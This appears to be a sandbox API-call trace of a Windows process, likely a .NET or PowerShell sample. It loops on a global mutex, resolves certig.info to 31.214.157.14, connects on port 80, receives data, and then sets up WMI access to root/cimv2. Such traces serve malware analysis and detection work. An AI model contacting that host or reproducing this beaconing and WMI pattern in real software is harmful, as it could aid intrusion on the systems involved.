	[0236.311] GetCurrentProcess () returned 0xffffffff
	[0236.311] GetLastError () returned 0x0
	[0236.311] GetCurrentProcess () returned 0xffffffff
	[0236.311] GetLastError () returned 0x0
	[0236.311] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5eae5a0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5eae5a0*=0x404) returned 1
	[0236.311] GetLastError () returned 0x0
	[0236.312] CloseHandle (hObject=0x404) returned 1
	[0236.312] GetLastError () returned 0x0
	[0236.312] CloseHandle (hObject=0x3fc) returned 1
	[0236.312] GetLastError () returned 0x0
	[0236.313] ReleaseMutex (hMutex=0x3ec) returned 1
	[0236.325] GetLastError () returned 0x0
	[0236.326] CloseHandle (hObject=0x3ec) returned 1
	[0236.326] GetLastError () returned 0x0
	[0236.326] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2b1a9e0, cbSid=0x5eae688 | out: pSid=0x2b1a9e0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5eae688) returned 1
	[0236.326] GetLastError () returned 0x0
	[0236.326] CreateMutexW (lpMutexAttributes=0x2b1aaf0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0236.327] GetLastError () returned 0x5
	[0236.329] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x3ec
	[0236.329] GetLastError () returned 0x5
	[0236.329] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1f4) returned 0x0
	[0236.392] GetLastError () returned 0x5
	[0236.393] ReleaseMutex (hMutex=0x3ec) returned 1
	[0236.393] GetLastError () returned 0x5
	[0236.393] CloseHandle (hObject=0x3ec) returned 1
	[0236.393] GetLastError () returned 0x5
	[0236.393] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2b1b27c, cbSid=0x5eae688 | out: pSid=0x2b1b27c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5eae688) returned 1
	[0236.393] GetLastError () returned 0x5
	[0236.393] CreateMutexW (lpMutexAttributes=0x2b1b38c, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0236.393] GetLastError () returned 0x5
	[0236.394] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x3ec
	[0236.394] GetLastError () returned 0x5
	[0236.394] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1f4) returned 0x0
	[0236.394] GetLastError () returned 0x5
	[0236.394] ReleaseMutex (hMutex=0x3ec) returned 1
	[0236.394] GetLastError () returned 0x5
	[0236.395] CloseHandle (hObject=0x3ec) returned 1
	[0236.395] GetLastError () returned 0x5
	[0236.395] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2b1bb28, cbSid=0x5eae688 | out: pSid=0x2b1bb28*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5eae688) returned 1
	[0236.395] GetLastError () returned 0x5
	[0236.395] CreateMutexW (lpMutexAttributes=0x2b1bc38, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0236.395] GetLastError () returned 0x5
	[0236.395] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x3ec
	[0236.395] GetLastError () returned 0x5
	[0236.395] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1f4) returned 0x0
	[0236.395] GetLastError () returned 0x5
	[0236.396] ReleaseMutex (hMutex=0x3ec) returned 1
	[0236.396] GetLastError () returned 0x5
	[0236.396] CloseHandle (hObject=0x3ec) returned 1
	[0236.396] GetLastError () returned 0x5
	[0236.396] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2b1c3cc, cbSid=0x5eae688 | out: pSid=0x2b1c3cc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5eae688) returned 1
	[0236.396] GetLastError () returned 0x5
	[0236.396] CreateMutexW (lpMutexAttributes=0x2b1c4dc, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0236.397] GetLastError () returned 0x5
	[0236.397] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x3ec
	[0236.397] GetLastError () returned 0x5
	[0236.397] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1f4) returned 0x0
	[0236.397] GetLastError () returned 0x5
	[0236.397] ReleaseMutex (hMutex=0x3ec) returned 1
	[0236.397] GetLastError () returned 0x5
	[0236.397] CloseHandle (hObject=0x3ec) returned 1
	[0236.397] GetLastError () returned 0x5
	[0236.397] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2b1cc6c, cbSid=0x5eae680 | out: pSid=0x2b1cc6c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5eae680) returned 1
	[0236.397] GetLastError () returned 0x5
	[0236.398] CreateMutexW (lpMutexAttributes=0x2b1cd7c, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0236.398] GetLastError () returned 0x5
	[0236.398] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x3ec
	[0236.398] GetLastError () returned 0x5
	[0236.398] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1f4) returned 0x0
	[0236.398] GetLastError () returned 0x5
	[0236.398] ReleaseMutex (hMutex=0x3ec) returned 1
	[0236.398] GetLastError () returned 0x5
	[0236.398] CloseHandle (hObject=0x3ec) returned 1
	[0236.398] GetLastError () returned 0x5
	[0236.398] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2b1d4fc, cbSid=0x5eae680 | out: pSid=0x2b1d4fc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5eae680) returned 1
	[0236.398] GetLastError () returned 0x5
	[0236.399] CreateMutexW (lpMutexAttributes=0x2b1d60c, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0236.399] GetLastError () returned 0x5
	[0236.399] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x3ec
	[0236.399] GetLastError () returned 0x5
	[0236.399] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1f4) returned 0x0
	[0236.399] GetLastError () returned 0x5
	[0236.399] ReleaseMutex (hMutex=0x3ec) returned 1
	[0236.399] GetLastError () returned 0x5
	[0236.399] CloseHandle (hObject=0x3ec) returned 1
	[0236.399] GetLastError () returned 0x5
	[0236.400] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2b1dd84, cbSid=0x5eae680 | out: pSid=0x2b1dd84*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5eae680) returned 1
	[0236.400] GetLastError () returned 0x5
	[0236.400] CreateMutexW (lpMutexAttributes=0x2b1de94, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0236.400] GetLastError () returned 0x5
	[0236.400] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x3ec
	[0236.400] GetLastError () returned 0x5
	[0236.400] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1f4) returned 0x0
	[0236.400] GetLastError () returned 0x5
	[0236.400] ReleaseMutex (hMutex=0x3ec) returned 1
	[0236.400] GetLastError () returned 0x5
	[0236.401] CloseHandle (hObject=0x3ec) returned 1
	[0236.401] GetLastError () returned 0x5
	[0236.401] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2b1e61c, cbSid=0x5eae680 | out: pSid=0x2b1e61c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5eae680) returned 1
	[0236.401] GetLastError () returned 0x5
	[0236.401] CreateMutexW (lpMutexAttributes=0x2b1e72c, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0236.401] GetLastError () returned 0x5
	[0236.401] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x3ec
	[0236.401] GetLastError () returned 0x5
	[0236.401] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1f4) returned 0x0
	[0236.402] GetLastError () returned 0x5
	[0236.402] ReleaseMutex (hMutex=0x3ec) returned 1
	[0236.402] GetLastError () returned 0x5
	[0236.402] CloseHandle (hObject=0x3ec) returned 1
	[0236.402] GetLastError () returned 0x5
	[0236.402] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2b1eeac, cbSid=0x5eae680 | out: pSid=0x2b1eeac*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5eae680) returned 1
	[0236.402] GetLastError () returned 0x5
	[0236.403] CreateMutexW (lpMutexAttributes=0x2b1efbc, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0236.403] GetLastError () returned 0x5
	[0236.403] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x3ec
	[0236.403] GetLastError () returned 0x5
	[0236.403] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1f4) returned 0x0
	[0236.403] GetLastError () returned 0x5
	[0236.403] ReleaseMutex (hMutex=0x3ec) returned 1
	[0236.403] GetLastError () returned 0x5
	[0236.404] CloseHandle (hObject=0x3ec) returned 1
	[0236.404] GetLastError () returned 0x5
	[0236.409] getaddrinfo (in: pNodeName="certig.info", pServiceName=0x0, pHints=0x5eae880*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x5eae614 | out: ppResult=0x5eae614*=0x38b828*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="certig.info", ai_addr=0x395c60*(sa_family=2, sin_port=0x0, sin_addr="31.214.157.14"), ai_next=0x0)) returned 0
	[0236.596] GetLastError () returned 0x0
	[0236.598] FreeAddrInfoW (pAddrInfo=0x38b828*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="散瑲杩椮普o࠰Ս쟧⺲", ai_addr=0x395c60*(sa_family=2, sin_port=0x0, sin_addr="31.214.157.14"), ai_next=0x0)) 
	[0236.598] GetLastError () returned 0x0
	[0236.598] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x420
	[0236.598] GetLastError () returned 0x0
	[0236.599] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x428
	[0236.599] GetLastError () returned 0x0
	[0236.601] WSAConnect (in: s=0x420, name=0x2b1f518*(sa_family=2, sin_port=0x50, sin_addr="31.214.157.14"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0236.626] GetLastError () returned 0x0
	[0236.627] closesocket (s=0x428) returned 0
	[0236.628] GetLastError () returned 0x0
	[0238.693] recv (in: s=0x420, buf=0x2dddbe4, len=502, flags=0 | out: buf=0x2dddbe4*) returned 326
	[0238.693] GetLastError () returned 0x0
	[0240.301] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ef58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0240.301] GetLastError () returned 0xcb
	[0240.326] VirtualQuery (in: lpAddress=0x5eadd68, lpBuffer=0x5eaed68, dwLength=0x1c | out: lpBuffer=0x5eaed68*(BaseAddress=0x5ead000, AllocationBase=0x5520000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0240.475] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ef58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0240.475] GetLastError () returned 0xcb
	[0240.599] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ef58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0240.599] GetLastError () returned 0xcb
	[0240.791] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x370
	[0240.791] GetLastError () returned 0x0
	[0240.794] CoGetObjectContext (in: riid=0x2e5da34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5eae8dc | out: ppv=0x5eae8dc*=0x2d8dec) returned 0x0
	[0241.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x5eada94, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\", lpFilePart=0x0) returned 0x2e
	[0241.059] GetLastError () returned 0x0
	[0241.062] LoadLibraryA (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\\\wminet_utils.dll") returned 0x6a310000
	[0241.260] GetProcAddress (hModule=0x6a310000, lpProcName="ResetSecurity") returned 0x6a311944
	[0241.264] GetProcAddress (hModule=0x6a310000, lpProcName="SetSecurity") returned 0x6a311986
	[0241.267] GetProcAddress (hModule=0x6a310000, lpProcName="BlessIWbemServices") returned 0x6a3119cc
	[0241.270] GetProcAddress (hModule=0x6a310000, lpProcName="BlessIWbemServicesObject") returned 0x6a311a1e
	[0241.274] GetProcAddress (hModule=0x6a310000, lpProcName="GetPropertyHandle") returned 0x6a311a70
	[0241.277] GetProcAddress (hModule=0x6a310000, lpProcName="WritePropertyValue") returned 0x6a311a89
	[0241.280] GetProcAddress (hModule=0x6a310000, lpProcName="Clone") returned 0x6a311aa2
	[0241.282] GetProcAddress (hModule=0x6a310000, lpProcName="VerifyClientKey") returned 0x6a312270
	[0241.285] GetProcAddress (hModule=0x6a310000, lpProcName="GetQualifierSet") returned 0x6a311d73
	[0241.366] GetProcAddress (hModule=0x6a310000, lpProcName="Get") returned 0x6a311b96
	[0241.367] GetProcAddress (hModule=0x6a310000, lpProcName="Put") returned 0x6a311b7a
	[0241.369] GetProcAddress (hModule=0x6a310000, lpProcName="Delete") returned 0x6a311bb5
	[0241.371] GetProcAddress (hModule=0x6a310000, lpProcName="GetNames") returned 0x6a311bc8
	[0241.373] GetProcAddress (hModule=0x6a310000, lpProcName="BeginEnumeration") returned 0x6a311be4
	[0241.375] GetProcAddress (hModule=0x6a310000, lpProcName="Next") returned 0x6a311bf7
	[0241.376] GetProcAddress (hModule=0x6a310000, lpProcName="EndEnumeration") returned 0x6a311c16
	[0241.378] GetProcAddress (hModule=0x6a310000, lpProcName="GetPropertyQualifierSet") returned 0x6a311c26
	[0241.408] IUnknown:QueryInterface (in: This=0x2d8dec, riid=0x2e5da1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x5eae8d8 | out: ppvObject=0x5eae8d8*=0x0) returned 0x80004002
	[0241.408] IUnknown:Release (This=0x2d8dec) returned 0x0
	[0241.519] IIDFromString (in: lpsz="{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}", lpiid=0x5eae48c | out: lpiid=0x5eae48c) returned 0x0
	[0241.519] CoGetClassObject (in: rclsid=0x38bb74*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x746da3b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5eae3f4 | out: ppv=0x5eae3f4*=0x6260810) returned 0x0
	[0242.065] WbemDefPath:IUnknown:QueryInterface (in: This=0x6260810, riid=0x747c7ecc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5eae224 | out: ppvObject=0x5eae224*=0x0) returned 0x80004002
	[0242.066] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6260810, pUnkOuter=0x0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae25c | out: ppvObject=0x5eae25c*=0x6260820) returned 0x0
	[0242.066] WbemDefPath:IUnknown:QueryInterface (in: This=0x6260820, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae000 | out: ppvObject=0x5eae000*=0x6260820) returned 0x0
	[0242.067] WbemDefPath:IUnknown:QueryInterface (in: This=0x6260820, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5eadfbc | out: ppvObject=0x5eadfbc*=0x0) returned 0x80004002
	[0242.067] WbemDefPath:IUnknown:AddRef (This=0x6260820) returned 0x3
	[0242.067] CoGetContextToken (in: pToken=0x5eade48 | out: pToken=0x5eade48) returned 0x0
	[0242.067] CoGetObjectContext (in: riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38ab54 | out: ppv=0x38ab54*=0x2d8de0) returned 0x0
	[0242.068] WbemDefPath:IUnknown:QueryInterface (in: This=0x6260820, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eade30 | out: ppvObject=0x5eade30*=0x3a40b0) returned 0x0
	[0242.068] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x3a40b0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5eade38 | out: pCid=0x5eade38*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0242.068] WbemDefPath:IUnknown:Release (This=0x3a40b0) returned 0x3
	[0242.068] CoGetContextToken (in: pToken=0x5eade40 | out: pToken=0x5eade40) returned 0x0
	[0242.068] WbemDefPath:IUnknown:AddRef (This=0x6260820) returned 0x4
	[0242.068] WbemDefPath:IUnknown:QueryInterface (in: This=0x6260820, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadeb4 | out: ppvObject=0x5eadeb4*=0x0) returned 0x80004002
	[0242.068] WbemDefPath:IUnknown:Release (This=0x6260820) returned 0x3
	[0242.069] WbemDefPath:IUnknown:Release (This=0x6260820) returned 0x2
	[0242.069] WbemDefPath:IUnknown:Release (This=0x6260810) returned 0x0
	[0242.069] WbemDefPath:IUnknown:Release (This=0x6260820) returned 0x1
	[0242.069] CoGetContextToken (in: pToken=0x5eae6f0 | out: pToken=0x5eae6f0) returned 0x0
	[0242.070] CoGetContextToken (in: pToken=0x5eae6b0 | out: pToken=0x5eae6b0) returned 0x0
	[0242.070] WbemDefPath:IUnknown:AddRef (This=0x6260820) returned 0x2
	[0242.070] WbemDefPath:IUnknown:QueryInterface (in: This=0x6260820, riid=0x5eae72c*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5eae728 | out: ppvObject=0x5eae728*=0x6260820) returned 0x0
	[0242.070] WbemDefPath:IUnknown:Release (This=0x6260820) returned 0x2
	[0242.070] WbemDefPath:IUnknown:Release (This=0x6260820) returned 0x1
	[0242.071] CoGetObjectContext (in: riid=0x2e5da34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5eae100 | out: ppv=0x5eae100*=0x2d8dec) returned 0x0
	[0242.071] IComThreadingInfo:GetCurrentApartmentType (in: This=0x2d8dec, pAptType=0x5eae0f8 | out: pAptType=0x5eae0f8*=1) returned 0x0
	[0242.071] IUnknown:QueryInterface (in: This=0x2d8dec, riid=0x2e5da1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x5eae0fc | out: ppvObject=0x5eae0fc*=0x0) returned 0x80004002
	[0242.071] IUnknown:Release (This=0x2d8dec) returned 0x1
	[0242.073] CoGetClassObject (in: rclsid=0x38bb74*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x746da3b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5eadc18 | out: ppv=0x5eadc18*=0x6260810) returned 0x0
	[0242.074] WbemDefPath:IUnknown:QueryInterface (in: This=0x6260810, riid=0x747c7ecc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5eada48 | out: ppvObject=0x5eada48*=0x0) returned 0x80004002
	[0242.074] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6260810, pUnkOuter=0x0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eada80 | out: ppvObject=0x5eada80*=0x62608b8) returned 0x0
	[0242.074] WbemDefPath:IUnknown:QueryInterface (in: This=0x62608b8, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5ead824 | out: ppvObject=0x5ead824*=0x62608b8) returned 0x0
	[0242.074] WbemDefPath:IUnknown:QueryInterface (in: This=0x62608b8, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5ead7e0 | out: ppvObject=0x5ead7e0*=0x0) returned 0x80004002
	[0242.074] WbemDefPath:IUnknown:AddRef (This=0x62608b8) returned 0x3
	[0242.074] CoGetContextToken (in: pToken=0x5ead66c | out: pToken=0x5ead66c) returned 0x0
	[0242.075] WbemDefPath:IUnknown:QueryInterface (in: This=0x62608b8, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5ead654 | out: ppvObject=0x5ead654*=0x3a40c0) returned 0x0
	[0242.075] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x3a40c0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5ead65c | out: pCid=0x5ead65c*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0242.075] WbemDefPath:IUnknown:Release (This=0x3a40c0) returned 0x3
	[0242.075] CoGetContextToken (in: pToken=0x5ead664 | out: pToken=0x5ead664) returned 0x0
	[0242.075] WbemDefPath:IUnknown:AddRef (This=0x62608b8) returned 0x4
	[0242.075] WbemDefPath:IUnknown:QueryInterface (in: This=0x62608b8, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5ead6d8 | out: ppvObject=0x5ead6d8*=0x0) returned 0x80004002
	[0242.075] WbemDefPath:IUnknown:Release (This=0x62608b8) returned 0x3
	[0242.075] WbemDefPath:IUnknown:Release (This=0x62608b8) returned 0x2
	[0242.076] WbemDefPath:IUnknown:Release (This=0x6260810) returned 0x0
	[0242.076] WbemDefPath:IUnknown:Release (This=0x62608b8) returned 0x1
	[0242.076] CoGetContextToken (in: pToken=0x5eadf14 | out: pToken=0x5eadf14) returned 0x0
	[0242.076] CoGetContextToken (in: pToken=0x5eaded4 | out: pToken=0x5eaded4) returned 0x0
	[0242.076] WbemDefPath:IUnknown:AddRef (This=0x62608b8) returned 0x2
	[0242.076] WbemDefPath:IUnknown:QueryInterface (in: This=0x62608b8, riid=0x5eadf50*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5eadf4c | out: ppvObject=0x5eadf4c*=0x62608b8) returned 0x0
	[0242.076] WbemDefPath:IUnknown:Release (This=0x62608b8) returned 0x2
	[0242.076] WbemDefPath:IUnknown:Release (This=0x62608b8) returned 0x1
	[0242.149] CoGetContextToken (in: pToken=0x5eadf94 | out: pToken=0x5eadf94) returned 0x0
	[0242.149] CoGetContextToken (in: pToken=0x5eadf54 | out: pToken=0x5eadf54) returned 0x0
	[0242.149] WbemDefPath:IUnknown:AddRef (This=0x62608b8) returned 0x2
	[0242.149] WbemDefPath:IUnknown:QueryInterface (in: This=0x62608b8, riid=0x5eadfd0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5eadfcc | out: ppvObject=0x5eadfcc*=0x62608b8) returned 0x0
	[0242.149] WbemDefPath:IUnknown:Release (This=0x62608b8) returned 0x2
	[0242.149] WbemDefPath:IUnknown:AddRef (This=0x62608b8) returned 0x3
	[0242.149] WbemDefPath:IWbemPath:SetText (This=0x62608b8, uMode=0x4, pszPath="//./root/cimv2") returned 0x0
	[0242.149] WbemDefPath:IUnknown:Release (This=0x62608b8) returned 0x2
	[0242.150] CoGetContextToken (in: pToken=0x5eae770 | out: pToken=0x5eae770) returned 0x0
